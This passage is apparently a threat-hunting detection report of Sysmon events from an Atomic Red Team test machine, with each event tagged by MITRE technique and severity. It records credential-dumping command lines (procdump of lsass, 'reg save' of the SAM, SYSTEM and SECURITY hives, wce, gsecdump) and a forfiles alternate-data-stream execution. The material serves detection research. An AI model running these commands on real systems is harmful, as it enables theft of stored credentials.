0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-DD47-5D31-0000-001015874900 + 5840 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563549086.686585,2019-07-19T19:11:26.686585+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "procdump.exe -accepteula -ma lsass.exe lsass_dump.dmp" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4124 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 15:11:26.626 + 747F3D96-DD9E-5D31-0000-00106E2C4B00 + 5488 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "procdump.exe -accepteula -ma lsass.exe lsass_dump.dmp" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-DD47-5D31-0000-001015874900 + 5840 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563549086.642464,2019-07-19T19:11:26.642464+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4123 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 15:11:26.535 + 
747F3D96-DD9E-5D31-0000-0010CB274B00 + 3016 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-DD47-5D31-0000-001015874900 + 5840 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563549083.336763,2019-07-19T19:11:23.336763+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg save HKLM\security security" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4121 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 15:11:23.302 + 747F3D96-DD9B-5D31-0000-00106C1C4B00 + 7164 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "reg save HKLM\security security" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-DD47-5D31-0000-001015874900 + 5840 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563549081.105496,2019-07-19T19:11:21.105496+04:00,,Threat,Low,Found User 
(MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg save HKLM\system system" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4119 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 15:11:21.069 + 747F3D96-DD99-5D31-0000-001069A34A00 + 4080 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "reg save HKLM\system system" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-DD47-5D31-0000-001015874900 + 5840 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563549077.243643,2019-07-19T19:11:17.243643+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg save HKLM\sam sam" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4117 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 15:11:17.211 + 747F3D96-DD95-5D31-0000-001075964A00 + 7140 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "reg save HKLM\sam sam" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + 
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-DD47-5D31-0000-001015874900 + 5840 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563549077.224751,2019-07-19T19:11:17.224751+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4116 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 15:11:17.139 + 747F3D96-DD95-5D31-0000-0010D6914A00 + 6264 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-DD47-5D31-0000-001015874900 + 5840 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1003] Credential Dumping - Process,1563549077.149274,2019-07-19T19:11:17.149274+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) through process name (C:\Windows\System32\cmd.exe) tried dumping credentials through commandline ( "C:\Windows\system32\cmd.exe" /c "wce -o output.txt" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4115 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 15:11:17.097 + 747F3D96-DD95-5D31-0000-0010B38E4A00 + 5216 + C:\Windows\System32\cmd.exe + 
10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "wce -o output.txt" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-DD47-5D31-0000-001015874900 + 5840 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563549077.149274,2019-07-19T19:11:17.149274+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "wce -o output.txt" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4115 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 15:11:17.097 + 747F3D96-DD95-5D31-0000-0010B38E4A00 + 5216 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "wce -o output.txt" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-DD47-5D31-0000-001015874900 + 5840 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563549077.107912,2019-07-19T19:11:17.107912+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( 
"C:\Windows\system32\cmd.exe" /c ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4114 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 15:11:17.016 + 747F3D96-DD95-5D31-0000-0010148A4A00 + 5476 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-DD47-5D31-0000-001015874900 + 5840 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1003] Credential Dumping - Process,1563549077.027188,2019-07-19T19:11:17.027188+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) through process name (C:\Windows\System32\cmd.exe) tried dumping credentials through commandline ( "C:\Windows\system32\cmd.exe" /c "gsecdump -a" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4113 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 15:11:16.975 + 747F3D96-DD94-5D31-0000-0010F4864A00 + 3920 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "gsecdump -a" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-DD47-5D31-0000-001015874900 + 5840 + 
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563549077.027188,2019-07-19T19:11:17.027188+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "gsecdump -a" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4113 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 15:11:16.975 + 747F3D96-DD94-5D31-0000-0010F4864A00 + 3920 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "gsecdump -a" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-DD47-5D31-0000-001015874900 + 5840 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +Prohibited Process connecting to internet,1563549076.48799,2019-07-19T19:11:16.487990+04:00,,Threat,Critical,"User (MSEDGEWIN10\IEUser) run process C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe and initiated network connection from hostname ( MSEDGEWIN10.home and IP ( 10.0.2.15 ) to hostname ( ) , IP ( 151.101.0.133 ) and port ( 443 )",3," + + + + + 3 + 5 + 4 + 3 + 0 + 0x8000000000000000 + + + 4111 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + Suspicious NetCon + 2019-07-19 15:11:03.652 + 747F3D96-DD47-5D31-0000-001015874900 + 5840 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + MSEDGEWIN10\IEUser + tcp + true + false + 10.0.2.15 + MSEDGEWIN10.home + 49744 + + false + 151.101.0.133 
+ + 443 + https + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1082] System Information Discovery,1563549068.184716,2019-07-19T19:11:08.184716+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) ith commandline ( "C:\Windows\system32\whoami.exe" /user) ,1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4110 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 15:11:07.987 + 747F3D96-DD8B-5D31-0000-001094584A00 + 5792 + C:\Windows\System32\whoami.exe + 10.0.17763.1 (WinBuild.160101.0800) + whoami - displays logged on user information + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\whoami.exe" /user + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=47D7864D26FC67E0D60391CBF170D33DA518C322,MD5=43C2D3293AD939241DF61B3630A9D3B6,SHA256=1D5491E3C468EE4B4EF6EDFF4BBC7D06EE83180F6F0B1576763EA2EFE049493A,IMPHASH=7FF0758B766F747CE57DFAC70743FB88 + 747F3D96-DD47-5D31-0000-001015874900 + 5840 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[ T0000 ] Suspicious process name detected,1563549068.184716,2019-07-19T19:11:08.184716+04:00,,Threat,High,User Name : ( MSEDGEWIN10\IEUser ) with Command Line : ( "C:\Windows\system32\whoami.exe" /user ) contain suspicious command ( whoami.exe),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4110 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 15:11:07.987 + 747F3D96-DD8B-5D31-0000-001094584A00 + 5792 + C:\Windows\System32\whoami.exe + 10.0.17763.1 (WinBuild.160101.0800) + whoami - displays logged on user information + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\whoami.exe" /user + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + 
SHA1=47D7864D26FC67E0D60391CBF170D33DA518C322,MD5=43C2D3293AD939241DF61B3630A9D3B6,SHA256=1D5491E3C468EE4B4EF6EDFF4BBC7D06EE83180F6F0B1576763EA2EFE049493A,IMPHASH=7FF0758B766F747CE57DFAC70743FB88 + 747F3D96-DD47-5D31-0000-001015874900 + 5840 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[ T1086 ] Powershell with Suspicious Argument,1563549052.700901,2019-07-19T19:10:52.700901+04:00,,Threat,Critical,"Found User (MSEDGEWIN10\IEUser) run Suspicious PowerShell commands that include (powershell) in event with Command Line (powershell) and Parent Image :C:\Windows\System32\cmd.exe , Parent CommandLine ("C:\Windows\system32\cmd.exe") in directory : ( c:\AtomicRedTeam\ )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4108 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 15:09:59.829 + 747F3D96-DD47-5D31-0000-001015874900 + 5840 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows PowerShell + Microsoft® Windows® Operating System + Microsoft Corporation + powershell + c:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F + 747F3D96-DD37-5D31-0000-00109D4C4900 + 5632 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1086] PowerShell Process found,1563549052.700901,2019-07-19T19:10:52.700901+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) through command line ( powershell ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4108 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 
2019-07-19 15:09:59.829 + 747F3D96-DD47-5D31-0000-001015874900 + 5840 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows PowerShell + Microsoft® Windows® Operating System + Microsoft Corporation + powershell + c:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F + 747F3D96-DD37-5D31-0000-00109D4C4900 + 5632 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563548999.931135,2019-07-19T19:09:59.931135+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4107 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 15:09:43.301 + 747F3D96-DD37-5D31-0000-00109D4C4900 + 5632 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D4B8-5D31-0000-0010A8CE0600 + 4416 + C:\Windows\explorer.exe + C:\Windows\Explorer.EXE + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +Prohibited Process connecting to internet,1563548980.973075,2019-07-19T19:09:40.973075+04:00,,Threat,Critical,"User (MSEDGEWIN10\IEUser) run process 
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe and initiated network connection from hostname ( MSEDGEWIN10.home and IP ( 10.0.2.15 ) to hostname ( ) , IP ( 151.101.0.133 ) and port ( 443 )",3," + + + + + 3 + 5 + 4 + 3 + 0 + 0x8000000000000000 + + + 4105 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + Suspicious NetCon + 2019-07-19 14:57:52.847 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + MSEDGEWIN10\IEUser + tcp + true + false + 10.0.2.15 + MSEDGEWIN10.home + 49734 + + false + 151.101.0.133 + + 443 + https + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563548278.359021,2019-07-19T18:57:58.359021+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4104 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:57:55.181 + 747F3D96-DA73-5D31-0000-001061933F00 + 1724 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1202] Indirect Command Execution,1563548275.236766,2019-07-19T18:57:55.236766+04:00,,Threat,Medium,Found User (MSEDGEWIN10\IEUser) through process name (C:\Windows\System32\forfiles.exe) tried accessing powershell history 
through commandline ( forfiles /p c:\windows\system32 /m notepad.exe /c c:\folder\normal.dll:evil.exe ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4103 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:57:55.056 + 747F3D96-DA73-5D31-0000-0010918F3F00 + 4092 + C:\Windows\System32\forfiles.exe + 10.0.17763.1 (WinBuild.160101.0800) + ForFiles - Executes a command on selected files + Microsoft® Windows® Operating System + Microsoft Corporation + forfiles /p c:\windows\system32 /m notepad.exe /c c:\folder\normal.dll:evil.exe + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=B7002C1601C326ED60C38E23366E5E8C919F326A,MD5=6E9F3CBB041D0670E2AC3378C3360045,SHA256=FA84D5B043EAD140FE304CBC71A9BFB3D24D3542FAB45DB65606C47808BD9272,IMPHASH=BB3BC1A3FEF88F916302D61DDC886F80 + 747F3D96-DA73-5D31-0000-00106A8D3F00 + 1052 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" /c "forfiles /p c:\windows\system32 /m notepad.exe /c " c:\folder\normal.dll:evil.exe + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563548275.138826,2019-07-19T18:57:55.138826+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "forfiles /p c:\windows\system32 /m notepad.exe /c " c:\folder\normal.dll:evil.exe ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4102 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:57:55.024 + 747F3D96-DA73-5D31-0000-00106A8D3F00 + 1052 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "forfiles /p c:\windows\system32 /m notepad.exe /c " c:\folder\normal.dll:evil.exe + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 
747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1202] Indirect Command Execution,1563548274.165319,2019-07-19T18:57:54.165319+04:00,,Threat,Medium,Found User (MSEDGEWIN10\IEUser) through process name (C:\Windows\System32\forfiles.exe) tried accessing powershell history through commandline ( forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4100 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:57:54.123 + 747F3D96-DA72-5D31-0000-001056513F00 + 3680 + C:\Windows\System32\forfiles.exe + 10.0.17763.1 (WinBuild.160101.0800) + ForFiles - Executes a command on selected files + Microsoft® Windows® Operating System + Microsoft Corporation + forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=B7002C1601C326ED60C38E23366E5E8C919F326A,MD5=6E9F3CBB041D0670E2AC3378C3360045,SHA256=FA84D5B043EAD140FE304CBC71A9BFB3D24D3542FAB45DB65606C47808BD9272,IMPHASH=BB3BC1A3FEF88F916302D61DDC886F80 + 747F3D96-DA72-5D31-0000-0010044F3F00 + 1300 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" /c "forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563548274.129841,2019-07-19T18:57:54.129841+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "forfiles /p c:\windows\system32 /m notepad.exe /c 
